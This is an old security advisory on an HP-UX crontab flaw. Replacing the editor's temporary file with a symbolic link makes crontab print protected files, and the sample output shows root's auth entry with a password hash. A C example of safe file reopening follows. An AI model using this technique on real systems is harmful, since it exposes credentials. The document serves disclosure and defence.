HP-UX crontab temporary file symbolic link vulnerability
24 Oct. 2000
Summary
A vulnerability in crontab allows local users to read arbitrary local files without root privileges or ownership of the file.
Note that not all local users can use crontab; only those listed in the crontab.allow file can.
Credit:
The information has been provided by Kyong-won Cho.
Running the crontab command with the -e option (crontab -e) starts the vi editor and creates a temporary file in /var/tmp/. The file is owned by the current user.
The attack is performed by exiting to a subshell using the '!sh' command in vi, linking the file created in /var/tmp/ and then exiting crontab. crontab then prints error messages that display the contents of the linked file, as the example shows.
Example:
To display the contents of /tcb/files/auth/r/root:
$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
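
Added example (not part of the original advisory and not HP's code): one way a privileged program can re-open an edit file safely after the editor exits, so that a file swapped for a link is rejected instead of being read and echoed back. The names reopen_edited and scenario are hypothetical, the /tmp paths are constructed, and the code assumes a POSIX.1-2008 system that provides O_NOFOLLOW.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Re-open the edit file after the editor exits. Returns a read-only fd, or -1
 * if the path no longer names a regular, singly linked file owned by `owner`. */
int reopen_edited(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: fail (ELOOP) if the final path component is a symlink.
     * O_NONBLOCK: do not hang if the path was swapped for a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;
    /* fstat the descriptor, not the path, so the checks apply to the object
     * that was actually opened and cannot be raced by another swap. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner ||   /* e.g. a hard link to another user's file */
        st.st_nlink != 1) {     /* any additional hard link */
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: returns 1 if the path is accepted, 0 if rejected.
 * swap_for_symlink simulates the replacement made from the editor subshell. */
int scenario(int swap_for_symlink)
{
    char edit[] = "/tmp/crontab_demo_XXXXXX", other[] = "/tmp/crontab_other_XXXXXX";
    int fd, ok, t1 = mkstemp(edit), t2 = mkstemp(other);
    if (t1 < 0 || t2 < 0) return -1;
    close(t1); close(t2);
    if (swap_for_symlink && (unlink(edit) != 0 || symlink(other, edit) != 0))
        return -1;
    fd = reopen_edited(edit, getuid());
    ok = fd >= 0;
    if (ok) close(fd);
    unlink(edit); unlink(other);
    return ok;
}

int main(void)
{
    printf("unchanged: %d, swapped for symlink: %d\n", scenario(0), scenario(1));
    return 0;
}
```

A privileged program can additionally switch its effective uid to the invoking user before opening the file, so that the kernel's normal permission checks apply to the read.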